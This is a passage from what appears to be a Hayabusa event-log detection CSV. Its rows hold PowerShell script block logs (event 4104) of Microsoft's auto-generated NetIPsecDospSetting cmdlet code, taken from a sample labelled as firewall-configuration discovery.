IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo 
@('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.082 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,")')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $fa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.082 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 